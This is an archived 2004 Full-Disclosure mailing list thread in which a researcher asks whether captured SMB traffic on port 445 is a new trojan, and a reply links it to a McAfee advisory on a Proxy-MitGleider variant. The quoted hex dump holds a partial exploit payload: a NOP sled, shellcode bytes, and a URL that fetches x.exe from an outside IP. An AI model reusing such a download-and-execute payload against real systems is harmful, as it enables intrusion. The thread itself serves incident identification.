| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <8654C851B1DAFA4FA18A9F150145F925020279EF@fnex01.fishnetsecurity.com> From: Trey.Keifer at fishnetsecurity.com (Keifer, Trey) Subject: Is this a new Trojan? A variant of Proxy-MitGleider which attempts to access a x.exe is referenced in this advisory from McAfee... http://vil.nai.com/vil/content/v_100944.htm > -----Original Message----- > From: Sumeet SINGH [mailto:susingh@...ucsd.edu] > Sent: Tuesday, August 31, 2004 4:35 PM > To: full-disclosure@...ts.netsys.com > Subject: [Full-Disclosure] Is this a new Trojan? > > hi, > > We've been seeing a large number of copies of a TCP packet to > port 445, that includes the following portion that we have > not seen before: > > 00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8 .....SMB%....... > 00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04 ................ > 00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00 ..`............. > 00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02 .........T...T.. > 00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00 .&..@...\.P.I.P. > 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00 E.\............. > a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00 ................ > ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ > 90 90 90 90 90 90 90 90 90 90 90 90 eb 58 68 74 .............Xht > 74 70 3a 2f 2f 32 30 32 2e 31 2e 32 30 30 2e 31 tp://202.1.200.1 > 39 3a 32 34 34 36 2f 78 2e 65 78 65 df df df df 9:2446/x.exe.... > df df df df df df df df df 4d 6f 7a 69 6c 6c 61 > .........Mozilla 2f 34 2e 30 df 5d 33 c9 66 b9 ee 01 8d 75 05 > 8b /4.0.]3.f....u.. > fe 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88 .....u.F..,0F4.. > > (the remainder of the packet has been removed) > > Has anyone seen this before? > The IP address (202.1.200.19) is unreachable. > > Is this an old exploit (worm/bot) that just took its time to > come around to us? > > -- sumeet > PhD. Student > UCSD > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > The information transmitted in this e-mail is intended only for the addressee and may contain confidential and/or privileged material. Any interception, review, retransmission, dissemination, or other use of, or taking of any action upon this information by persons or entities other than the intended recipient is prohibited by law and may subject them to criminal or civil liability. If you received this communication in error, please contact us immediately at 816.421.6611, and delete the communication from any computer or network system.
Powered by blists - more mailing lists